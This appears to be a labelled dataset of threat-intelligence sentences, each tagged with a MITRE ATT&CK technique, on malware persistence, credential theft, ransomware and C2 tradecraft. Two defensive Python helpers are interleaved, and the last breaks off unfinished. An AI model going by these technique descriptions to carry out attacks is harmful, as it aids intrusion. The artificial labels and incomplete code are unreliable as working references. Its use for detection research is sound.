{"text1":"Whitefly usually attempts to remain within a targeted organization for long periods of time\u2014often months\u2014in order to steal large volumes of information. It keeps the compromise alive by deploying a number of tools that facilitate communication between the attackers and infected computers","labels":"['T1059']"}
|
|
{"text1":"The binary will be saved in the %APPDATA% folder and, for persistence, it creates a scheduled task that will execute every hour","labels":"['T1053.005']"}
|
|
{"text1":"By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization\u2019s corporate and restricted segments","labels":"['T1090.001']"}
|
|
{"text1":"USB Worm -> this is the USBWorm component developed for stealing files from removable drives, spread across systems by infecting removable media, and download and execute the \u201cThin Client\u201d component from a remote Crimson server","labels":"['T1091']"}
|
|
{"text1":"GetST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf of another user. GetPac.py: This script will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having normal authenticated user credentials. It does so by using a mix of [MS-SFU]\u2019s S4USelf + User to User Kerberos Authentication. GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat. GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property \u2018Do not require Kerberos preauthentication\u2019 set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR. ticketConverter.py: This script will convert\u00a0kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa. raiseChild.py: This script implements a child-domain to forest privilege escalation by (ab)using the concept of Golden Tickets and ExtraSids","labels":"['T1558.003']"}
|
|
{"text1":"Creates events \"__klg__\" and \"__klgkillsoft__\" to act as mutexes and facilitate self-removal. Installs itself to %APPDATA%\\Intel Corporation\\IAStorIcon.exe. Creates an entry in the user's Startup folder for persistence. Uses the SetWindowsHookExW API function to capture keystrokes system-wide. Formats and writes the keylogger output to %APPDATA%\\Update\\Tmp\\k%d.txt, where %d is the current system tick count","labels":"['T1547.001']"}
|
|
{"text1":"The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps. Its decryption routine, part of an executable physical patch, begins somewhere between the start() and WinMain() functions. A fun fact is that the malware authors embedded their malicious code into a binary that was a harmless executable","labels":"['T1140']"}
|
|
{"text1":"Another component used by this group is a variant of TerraTV. It runs a legitimate TeamViewer application but hides its user interface elements, so that the operators of the malware can connect to the compromised computer undetected","labels":"['T1219']"}
|
|
{"text1":"It creates a socket, requests the address of the hardcoded C2 server \"win-restore.ru\" via gethostbyname() and connects to it. Thereafter, it also collects the volume serial number of C:\\ drive, the computer name and the hardware profile GUID. With this information, it creates the following string used by a subsequent send() function call","labels":"['T1082']"}
|
|
{"text1":"This is the final payload that has been deployed as a service using svchost.exe. This Rat is heavily obfuscated and is using multiple anti-analysis techniques. It has a custom section named \u201cqwdfr0\u201d which performs all the de-obfuscation process. This payload registers itself as a service using its export function ServiceMain","labels":"['T1543.003']"}
|
|
{"text1":"In previous attacks, we were able to determine the impacted organization based on the domain names and credentials used by the Disttrack tool to spread to other systems on the network. However, that functionality was missing from this sample. Unlike past Shamoon attacks, this particular Disttrack wiper would not overwrite files with an image. Instead it would overwrite the MBR, partitions, and files on the system with randomly generated data","labels":"['T1485']"}
|
|
{"text1":"Since 2014, Inception has widened its use of cloud service providers for C&C purposes. Whereas previously it relied on one service provider (CloudMe.com), more recently it has employed at least five cloud service providers","labels":"['T1102']"}
|
|
{"text1":"The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six-minute time span. The recipient email addresses suggest they may be the addresses used for specific regional branches of the targeted organization. However, based upon the captured session data, it is highly likely the source email address was spoofed. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed the OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time","labels":"['T1566.001']"}
|
|
{"text1":"Once initiated the agent proceeds to enumerate the infected machine using Windows Management Instrumentation (WMI) to obtain the following information","labels":"['T1047']"}
|
|
{"text1":"After trying to determine whether ports are open and the machine could act as a C2 tier 2 proxy, the proxy module also starts a multithreaded SOCKS5 proxy server. The SOCKS5 protocol is encapsulated into the QakBot proxy protocol composed of: QakBot proxy command (1 byte), version (1 byte), session id (4 bytes), total packet length (dword), data (total packet length-10). Incoming and outgoing packets are stored in the buffers and may be received\/transmitted one by one or in multiple packets in a single TCP data segment (streamed","labels":"['T1572']"}
|
|
{"text1":"The core component will check whether it is located in the %temp%\\[appname] directory, otherwise it copies itself to %temp%\\[appname]\\[appname] and sets the file attribute to hidden","labels":"['T1083']"}
|
|
{"text1":"First, the malware checks for the existence of a Mutex value, \u201cEKANS\u201d, on the victim. If present, the ransomware will stop with a message \u201calready encrypted. Otherwise, the Mutex value is set and encryption moves forward using standard encryption library functions. Primary functionality on victim systems is achieved via Windows Management Interface (WMI) calls, which begins executing encryption operations and removes Volume Shadow Copy backups on the victim","labels":"['T1486']"}
|
|
{"text1":"Function and variable names are obfuscated. Strings are encrypted. Contain an encrypted .NET injector and one or more encrypted PE payloads. Take one argument that is the decryption key for the embedded .NET injector and PE payload(s). - Embedded .NET injector and payload(s) are encoded with Base64 and encrypted with Rijndael","labels":"['T1027']"}
|
|
{"text1":"All of the attacks involved spear-phishing emails to deliver malicious documents that required the recipient to carry out some action. The payload in a majority of these attacks was a backdoor called Spark, which is a backdoor that allows the threat actors to open applications and run command line commands on the compromised system","labels":"['T1204.001', 'T1204.002']"}
|
|
{"text1":"We can also see files created in a TEMP folder that are serving as a small database, where Dyreza stores information, before they are sent to the C&C","labels":"['T1074.001']"}
|
|
{"text1":"Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\\Users\\<Redacted Username>\\Desktop\\OWAExchange","labels":"['T1059.006']"}
|
|
{"text1":"To ensure that the compromised system is unable to restore from backup, REvil deletes shadow copies and disables recovery mode by executing the following command via ShellExecute. The length and uniqueness of this command allow for the development of high-fidelity detection controls","labels":"['T1059.003']"}
|
|
{"text1":"an \u201cobject_id\u201d that is a unique uuid used to identify the victim, when the value is not set in the file, it is generated randomly by the malware - a list of processes into which code is injected (iproc) - the frequency and time for task execution \/ backup logs \/ connection to the C&C ([TIME]) - the IP addresses of other computers on the network ([CW_LOCAL]) - the C&C server addresses ([CW_INET]) - the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT","labels":"['T1016']"}
|
|
{"text1":"Throughout our investigation, many of the analyzed ZeroT RAR SFX samples (e.g. 67693ddb6236d3ef790059409ae240212c47acfd8c1c76d65c3ef19096fdf43b) contained a file named Go.exe which performs Windows UAC bypass. This executable contains a PDB path indicating its purpose of bypassing UAC (Fig","labels":"['T1548.002']"}
|
|
{"text1":"The \u2018microsoft-cache\u2019 domain was used by the malware variant that communicated over HTTP. We found four unique samples communicating with this domain, which resolved to the same Hong Kong-based IP address used by the first two domains","labels":"['T1016']"}
|
|
{"text1":"When the Trojan runs as an executable within the \"DsvHelper\" folder, the Trojan will create a shortcut (.lnk file) and save the shortcut to the 'DsvHelper' folder. The embedded payload written to process memory exists in the \"R\" resource and called function in the new payload is named \"RPe.Test.Work\". The function will take another executable embedded in the initial Trojan as a resource named \"M\", which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it's configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe","labels":"['T1055.012']"}
|
|
{"text1":"These encrypted blobs are dropped to C:\\Users\\user\\AppData\\Local\\Temp\\3f34a.tmp one after the other. Once they are dropped, the dropper also decrypts them and writes them to a newly created folder and creates persistence","labels":"['T1140']"}
|
|
{"text1":"It iterates over all possible Office <version> values for both Word and Excel <product> values. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The malware moves each located document into the AppData folder, inserts malicious Word or Excel macros into it using a Microsoft.Office.Interop object, and then moves the document back into its original folder. In the samples we analyzed, the injected macros were simple downloaders","labels":"['T1080']"}
|
|
{"text1":"PwDumpVariant: This tool imports lsremora.dll (often downloaded by the attacker as part of the toolset) and uses the GetHash export of this DLL. On execution, the tool injects itself into lsass.exe and is triggered with the argument \u201cdig","labels":"['T1003.001']"}
|
|
{"text1":"The developer rewrote a large part of the code however the workflow is the same as previously and some features are copy\/paste. The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with a hardcoded User-Agent: \"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011. The code is not exactly the same but the workflow and some constants are similar","labels":"['T1573.001']"}
|
|
{"text1":"Cardinal RAT is deployed using an interesting technique of compiling and executing a downloader via a malicious macro embedded within a Microsoft Excel file. The Excel files themselves contain lures that have financial themes. This threat has had a low volume of samples in the past two years, with 11 instances of Carp Downloader and 27 instances of Cardinal RAT observed","labels":"['T1204.002']"}
|
|
{"text1":"The first thread is responsible for taking a screenshot of the desktop of the victim machine. This screenshot data is both compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files","labels":"['T1113']"}
|
|
{"text1":"Once the \"instal.xml\" file began execution, it would deobfuscate the base64-encoded commands. This revealed a stager, or a small script designed to obtain an additional payload. One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. A copy of the deobfuscated stager can be seen in the image below","labels":"['T1140']"}
|
|
{"text1":"The group used Ruler to configure a specially crafted Outlook Home Page URL to exploit the security bypass vulnerability CVE-2017-11774, which was fixed shortly after it was discovered. Successful exploitation automatically triggered remote code execution of a script when an Outlook client synced with a mailbox and rendered the profile Home Page URL. These scripts, usually VBScript followed by PowerShell, in turn initiated the delivery of various payloads","labels":"['T1203']"}
|
|
{"text1":"If this is successful, the malware creates a :0 alternate data stream in the executable and copies the executable\u2019s own contents to the stream. This can be used to restore the executable later. Then the malware replaces the contents of the executable with a copy of itself and launches the service. The file modified time of the executable is also artificially changed to 00:00:00 UTC. The purpose of this time change is so the file can be identified and restored by the decryption tool","labels":"['T1070.006']"}
|
|
{"text1":"DNS Monitoring Bypass The malware modifies the system DNS resolvers and uses Google\u2019s public DNS servers to avoid being detected by DNS monitoring tools","labels":"['T1562.001']"}
|
|
{"text1":"Since the discovery of the {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll backdoor and its public analysis by multiple researchers, we observed some changes in the malware\u2019s configuration data. First, the authors started removing the names from the helper DLLs (DNSprov.dll and the two versions of HttpProv.dll). Then the operators stopped packaging the third DLL (second version of HttpProv.dll), choosing to embed just one","labels":"['T1082']"}
|
|
{"text1":"1) Using the compromised SolarWinds DLL to activate a backdoor that enables attackers to remotely control and operate on a device 2) Using the backdoor access to steal credentials, escalate privileges, and move laterally to gain the ability to create valid SAML tokens using any of two methods: Stealing the SAML signing certificate (Path 1) Adding to or modifying existing federation trust (Path 2) 3) Stealing the SAML signing certificate (Path 1) 4) Adding to or modifying existing federation trust (Path 2) 5) Using attacker-created SAML tokens to access cloud resources and perform actions leading to the exfiltration of emails and persistence in the cloud","labels":"['T1047']"}
|
|
{"text1":"The scripts themselves could be easily extracted and decompiled out of the binaries using uncompyle. The decompiled scripts employed some visual obfuscation techniques by naming variables as combinations of the characters \u2018o\u2019, \u2018O\u2019, and \u20180\u2019 to hinder analysis. In-depth analysis of the scripts showed the group employed AES in CBC mode using a predefined static key to encrypt files before uploading them to the C2 server","labels":"['T1027']"}
|
|
{"text1":"One of the documents spreads what analysts are calling SQLRat, previously unseen malware that drops files and executes SQL scripts on the host system. The use of SQL scripts is ingenious in that they don\u2019t leave artifacts behind the way traditional malware does. Once they are deleted by the attackers\u2019 code, there is nothing left to be forensically recovered. This technique has not been observed in previous campaigns associated with FIN7","labels":"['T1070.004']"}
|
|
{"text1":"The \u2018vsnet\u2019 plugin was intended to spread and launch a payload (BlackEnergy2 dropper itself at the moment) in the local network by using PsExec, as well as gaining primary information on the user\u2019s computer and network. It was a ddos tool compiled to run on ARM systems","labels":"['T1021.002']"}
|
|
{"text1":"Using Frame1_Layout for macro execution and using lesser known API calls for shellcode execution is known to be used by Lazarus. We also were able to find infrastructure overlap between this campaign and past campaigns of Lazarus (Figure 19","labels":"['T1106']"}
|
|
{"text1":"Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication","labels":"['T1098.004']"}
|
|
{"text1":"Kwampirs uses a fairly aggressive means to propagate itself once inside a victim's network by copying itself over network shares","labels":"['T1021.002']"}
|
|
{"text1":"When we deploy any web browser, it directly injects the code into its process and deploys illegitimate connections. It is the way to keep in touch with the C&C, monitor user\u2019s activity and steal credentials","labels":"['T1055']"}
|
|
{"text1":"In order to exfiltrate data from a network segment not connected to the Internet, the threat actor deployed a modified version of hTran. This \u2018connection bouncer\u2019 tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic. There have been numerous reports of hTran being used by different Chinese threat actors, including: APT3, APT27 and DragonOK","labels":"['T1090.002']"}
|
|
{"text1":"Each web shell instance is configured to contain SP, Key, and Log variables. When the malicious ISAPI filter captures a username matching this variable, it knows to handle the incoming HTTP request as a command to the web shell. The DES key to encrypt the credentials in the configuration observed by CTU researchers is 12345678, and the log file is c:\\log.txt. The decrypted contents of the log file adhere to the format in Figure 22","labels":"['T1560.003']"}
|
|
{"text1":"The original sample involved in the forbes.com breach used HTTP, which is consistent with the original variant discussed in this blog post. It should be noted that while the newest variant that uses direct network communication over port 22 no longer uses HTTP, references to the HTTP strings are still found within the sample itself. This is most likely due to code re-used by the attackers","labels":"['T1071.001']"}
|
|
{"text1":"Some of BRONZE PRESIDENT's malware has persistence capabilities. For example, ORat uses a WMI event consumer to maintain its presence on a compromised host. The group also creates and maintains scheduled tasks to achieve this purpose. Figure 8 shows a Sysdriver scheduled task that periodically executes a Cobalt Strike payload","labels":"['T1053.005']"}
|
|
{"text1":"Compromise website of strategic importance (e.g. websites visitors have a higher likelihood to be targets of interest) - Add one or more webshell backdoors to victim websites to maintain persistence - Webshell used to add JavaScript developed by OceanLotus into the website - The malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains to typically load one of two different OceanLotus frameworks - OceanLotus JavaScript frameworks designed to track, profile, and target the compromised website's visitors - Website visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising the user's system or e-mail accounts","labels":"['T1105']"}
|
|
{"text1":"Once decrypted, the backdoor takes a fingerprint of the system. It sends home various data, such as the computer and user names and the operating system version, before waiting for commands to carry out its main mission","labels":"['T1082']"}
|
|
{"text1":"Make a unique filename. This useful utility is widely used by malware to make random, unique file and directory names for payloads. Despite the name, mktemp does not have to be used only in the \/tmp directory","labels":"['T1564', 'T1564']"}
|
|
{"text1":"We discovered that TeamTNT gained initial access with the Hildegard malware by executing commands on kubelets that allow anonymous access. This was achieved by accessing the kubelet\u2019s run command API and executing commands on running containers","labels":"['T1133', 'T1609', 'T1609']"}
|
|
{"text1":"The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers. Due to their reliance on IE, these malware families intentionally configure the browser settings by modifying the following registry entries","labels":"['T1112', 'T1071.001']"}
|
|
{"text1":"We also identified a Tomiris variant (internally named \u201cSBZ\u201d, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc","labels":"['T1005']"}
|
|
{"text1":"The files are encrypted with a randomly generated 128-bit AES key in CBC mode with a NULL initialization vector. The key is generated per file, is encrypted with the generated RSA public key, and included in the encrypted file header. Each file encrypted by the malware starts with the string WANACRY. and has the WNCRY extension. Depending on the file properties, the malware may also stage files in a WNCRYT extension","labels":"['T1083']"}
|
|
{"text1":"Once TrickBot verifies it can connect to the Internet, it communicates with C2 servers, some of which using TOR-related domains. It collects and sends information about where the target machine is located to the C2 servers","labels":"['T1008']"}
|
|
{"text1":"In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The first byte of the string is used as the XOR key to in turn decode the remainder of the data","labels":"['T1082']"}
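The config decoding the PLAINTEE record describes (first byte of the blob is the XOR key for everything after it) as an added example for this corpus; this is not code from the malware or the original report, and the sample blob is constructed here rather than taken from a real PLAINTEE sample:

```python
"""Single-byte-XOR config decoder of the kind described for PLAINTEE.

Added example for this corpus, not the malware's own code. The blob is
constructed below; the key byte, the plaintext and the printable-ratio
threshold are all illustrative assumptions.
"""


def xor_decode_first_byte_key(blob: bytes) -> bytes:
    """Return the blob body XORed with its own first byte (the key byte)."""
    if len(blob) < 2:
        raise ValueError("blob must hold a key byte plus at least one data byte")
    key = blob[0]
    return bytes(b ^ key for b in blob[1:])


def xor_encode_first_byte_key(data: bytes, key: int) -> bytes:
    """Inverse of the decoder: prepend the key byte, XOR the rest with it."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte")
    return bytes([key]) + bytes(b ^ key for b in data)


def looks_like_config(decoded: bytes) -> bool:
    """Triage sanity check: a decoded config should be almost entirely printable.
    A key byte of 0x00 leaves the data unchanged, so this check also flags blobs
    that were never really encoded."""
    if not decoded:
        return False
    printable = sum(1 for b in decoded if 32 <= b < 127 or b in b"\r\n\t")
    return printable / len(decoded) > 0.9


# Constructed sample: a fake beacon target encoded under the key byte 0x5A.
SAMPLE_PLAINTEXT = b"host=c2.example.invalid;port=443;id=%GUID%"
SAMPLE_BLOB = xor_encode_first_byte_key(SAMPLE_PLAINTEXT, 0x5A)

if __name__ == "__main__":
    out = xor_decode_first_byte_key(SAMPLE_BLOB)
    print(out.decode("ascii"), "printable:", looks_like_config(out))
```

Run it against a blob carved from memory after the sample enters its beacon loop; because the key travels with the data, no brute force over 256 keys is needed, only the printable check to confirm the carve boundary was right.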
|
|
{"text1":"In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted","labels":"['T1070.004', 'T1070.001']"}
|
|
{"text1":"OverWatch continued to track the threat actor\u2019s malicious behavior as they downloaded additional scripts and then executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit","labels":"['T1059.001']"}
|
|
{"text1":"Following the reconnaissance phase, the threat actor attempted to dump credentials stored on the compromised machines. The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes. This version of mimikatz did not require any command line arguments, most likely in an attempt to avoid detection based on command-line auditing. The dumped hashes were used to authenticate to other machines via pass the hash","labels":"['T1003.001']"}
|
|
{"text1":"After gaining access to the victim\u2019s environment (presumably by using stolen credentials, either obtained via phishing, or bought on the dark web), the attacker sets up remote tunnelling using a SSH tool. The tool is configured to redirect traffic from a malicious domain to a proxy that is listening on a local port. The tunnel is authenticated using the attacker\u2019s private key","labels":"['T1572']"}
|
|
{"text1":"FoggyWeb is a passive and highly targeted backdoor capable of remotely exfiltrating sensitive information from a compromised AD FS server. It can also receive additional malicious components from a command-and-control (C2) server and execute them on the compromised server","labels":"['T1041', 'T1105']"}
|
|
{"text1":"In at least two incident response (IR) engagements, Blue Mockingbird has exploited public-facing web applications (T1190: Exploit Public-Facing Application) that implemented Telerik UI for ASP.NET AJAX. This suite of user interface components accelerates the web development process, but some versions are susceptible to a deserialization vulnerability, CVE-2019-18935. The exploitation of this CVE is not unique to Blue Mockingbird, but it has been a common point of entry","labels":"['T1190']"}
|
|
{"text1":"Lately, the configuration mechanism has been changed and is now stored in the Windows Registry at HKCU\\Software\\ under keys with names like %USERNAME% and ToolTech-RM. Those names, as well as the names of values they contain, change frequently, but the information contained consists of","labels":"['T1112']"}
|
|
{"text1":"Most of the initial payloads in these campaigns are signed with valid certificates to evade security tools. They abuse the relative trust that is given to signed binaries to avoid detection","labels":"['T1553.002']"}
|
|
{"text1":"In 2020, Pawn Storm often tries to obfuscate these brute force attempts by routing their attack traffic over Tor and VPN servers. In a Microsoft article about brute-forcing Office365 credentials over Tor, Microsoft attributed the activities to Strontium, which is another name for Pawn Storm. These brute force attacks started in 2019, and then we could firmly attribute them to Pawn Storm because we could cross-relate the extensive probing of Microsoft Autodiscover servers around the world with high-confidence indicators of the group\u2019s more traditional attack methods (spear phishing and credential phishing","labels":"['T1090.003']"}
|
|
{"text1":"The ROKRAT samples used during the two \"Evil New Year\" and the \"North Korean Human Rights\" campaigns contained a reconnaissance phase. The malware uses the following registry key to get the machine type: HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"System manufacturer\" value is used to identify the type of machine. The source code only considers the following machine types","labels":"['T1012']"}
|
|
{"text1":"The DNS response will return a CNAME record that points to a Command and Control (C2) domain. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications","labels":"['T1071.004']"}
|
|
{"text1":"The actors\u00a0leveraged\u00a0publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on\u00a0victim networks to collect Active Directory information and credentials. WMIC commands\u00a0have been used\u00a0to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture. The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to\u00a0res.txt. The actors used the\u00a0Nltest\u00a0command to list domain controllers","labels":"['T1018']"}
|
|
{"text1":"For example, the following sample loads the malware as shellcode within a .NET Framework project using msbuild.exe, effectively bypassing application allowlisting techniques","labels":"['T1127.001']"}
|
|
{"text1":"If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. However, if the malware is successful in elevating privileges, it begins to enumerate existing Windows services on the host that are configured to run as LocalSystem. The malware selects services that are currently not active and ignores services that launch the executables svchost.exe and lsass.exe. For each service, the malware attempts to take control of the service\u2019s executable \u2014 first using icacls.exe with the \/reset flag to reset the executable\u2019s permissions, then using takeown.exe with the \/F flag to take ownership of the executable","labels":"['T1007']"}
|
|
{"text1":"Microsoft by default disables the dynamic execution of the macro, and if an attacker needs to execute one dynamically\u2014which is the case here\u2014the threat actor needs to bypass the VB object model (VBOM) by modifying its registry value","labels":"['T1112']"}
|
|
{"text1":"After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below","labels":"['T1505.003']"}
|
|
{"text1":"This INI file is parsed to determine what Comnie should do. Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL). Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information","labels":"['T1119']"}
|
|
{"text1":"The samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided by the UPX project. Instead of having the \u201cUPX. string, it has been replaced with \u201cLSD. Repairing the header is needed to unpack the samples using the unpacker provided by the UPX team","labels":"['T1027']"}
|
|
{"text1":"According to Group-IB's Threat Intelligence & Attribution system, the alleged database was published on a fraudulent resource known for reselling data that has been published on various data-leak websites. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. Starting from at least February 23, 2021, a device inside the company's network communicated with a server with the IP address 185[.]118[.]166[.]66. The threat actor collected information inside the local network, including names of network resources and their addresses. Below are examples of commands that were used for lateral movement: . The name of the campaign, ColunmTK, is derived from these initially discovered domains. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. This IP address was used as an A record for two domains: server04[.]dns04[.]com and service04[.]dns04[.]com. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers","labels":"['T1049']"}
|
|
{"text1":"Qualys Threat Research has identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin. This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors","labels":"['T1083']"}
|
|
{"text1":"It then issues a SOAP request to delete the processed email. This completes the process in which the payload receives inbound communications from the actor","labels":"['T1070.004']"}
|
|
{"text1":"Now the virtual environment is prepared, the install.bat command goes through a list of process names and terminates these processes so any files they have open are unlocked and become accessible for encryption. This list of 50 entries consists of mainly line-of-business applications, database, remote management and backup applications and is stored in a text file. Another text file contains services names. These are tailored to the victim organization\u2019s network environment, including process and service names belonging to endpoint protection software","labels":"['T1489']"}
|
|
{"text1":"Prior to 2014, IRON LIBERTY used custom malware, primarily Sysmain, Havex, and xFrost (now known as Karagany), combined with commodity penetration testing and tools","labels":"['T1189']"}
|
|
{"text1":"The Bluetooth functionality in Flamer is encoded in a module called \"BeetleJuice\". This module is triggered according to configuration values set by the attacker. This means that a computer compromised by W32.Flamer will appear when any other Bluetooth device scans the local area. In addition to enabling a Bluetooth beacon, Flamer encodes details about the infected computer (see Figure 1) and then stores these details in a special 'description' field. When any other device scans for Bluetooth-enabled devices, this description field will be displayed: These are the facts of how Flamer uses Bluetooth. The attacker, however, could identify the location of compromised devices using Bluetooth. The Beetlejuice module has already retrieved a list of all the device IDs which are near to the infected computer and so the attacker knows what devices belong to the victim. Some attacks have even identified Bluetooth devices more than one mile away. With increased functionality an attacker, having identified various Bluetooth devices in range, could perform numerous attacks: - Steal contacts from an address book, steal SMS messages, steal images, and more. An attacker within one mile of the target could use their own Bluetooth-enabled device for this. If the second computer is using a secured network and was infected through a USB connection, potentially the only network available would be a Bluetooth connection back to the first compromised computer","labels":"['T1011.001']"}
|
|
{"text1":"The SysInfo plugin runs a selection of basic reconnaissance commands on the victim's machine via a cmd.exe process","labels":"['T1059.003']"}
|
|
{"text1":"To compress the data, GetFrame() invokes the Common.Compress() method, which is used to compress the data by leveraging the C# GZipStream compression class","labels":"['T1560.002']"}
|
|
{"text1":"On top of this configuration change, this sample does not use the libcurl library for network exfiltration. Instead, it uses an external library. To locate it, the backdoor tries to decrypt each file in the current directory using AES-256-CBC with the key gFjMXBgyXWULmVVVzyxy padded with zeroes. Each file is \u201cdecrypted\u201d and saved as \/tmp\/store and an attempt to load it as a library made using the dlopen function. When a decryption attempt results in a successful call to dlopen, the backdoor then retrieves the exported functions Boriry and ChadylonV, which seem to be responsible for the network communication with the server. As we do not have the dropper or other files from the original sample\u2019s location, we could not analyse this library. Moreover, since the component is encrypted, a YARA rule based on these strings would not match the file found on disk","labels":"['T1027']"}
|
|
{"text1":"FIVEHANDS uses an embedded NTRU public key. This NTRU key is SHA512 hashed and the first 32 bytes are used as the victim ID within the ransom note. This NTRU public key is also used to encrypt each file's symmetric key. For the symmetric key, FIVEHANDS uses an embedded generation routine to produce 16 random bytes used for an AES key to encrypt each file. After each file is encrypted, the original file size, magic value of DE C0 AD BA, and AES key are encrypted with the public NTRU key and appended to the file. The four magic bytes DB DC CC AB are appended to the end of the encrypted file. FIVEHANDS includes additional code not found in DEATHRANSOM and HELLOKITTY to use the Windows Restart Manager to close a file currently in use so that it can be unlocked and successfully encrypted","labels":"['T1486']"}
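A triage helper for the on-disk markers the WannaCry record (WANACRY header, WNCRY and WNCRYT extensions) and the FIVEHANDS record (DB DC CC AB trailer) describe, added here for this corpus; it is not code from either family or from the original reports. Only the markers quoted in the text are used: no header layout beyond the magic prefix is assumed, and the DE C0 AD BA value is not checked because the text places it inside the NTRU-encrypted block, where it is not visible in plaintext. The sample files are constructed.

```python
"""Classify files by the ransomware markers the corpus describes.

Added example for this corpus, not code from WannaCry, FIVEHANDS or the
reports quoted here. SAMPLES below are constructed stand-ins, not real
encrypted files.
"""
import os
from typing import Dict, Optional

# WannaCry: file content starts with the string WANACRY; final extension
# .WNCRY, staging extension .WNCRYT (extensions compared case-insensitively).
WANACRY_MAGIC = b"WANACRY"
WANACRY_EXTS = (".wncry", ".wncryt")

# FIVEHANDS: four magic bytes appended after the NTRU-wrapped key block.
FIVEHANDS_TRAILER = bytes.fromhex("DBDCCCAB")


def classify_encrypted_file(name: str, data: bytes) -> Optional[str]:
    """Return the family name when a content or extension marker matches."""
    ext = os.path.splitext(name)[1].lower()
    if data.startswith(WANACRY_MAGIC) or ext in WANACRY_EXTS:
        return "WannaCry"
    if data.endswith(FIVEHANDS_TRAILER):
        return "FIVEHANDS"
    return None


def is_staged_wannacry(name: str) -> bool:
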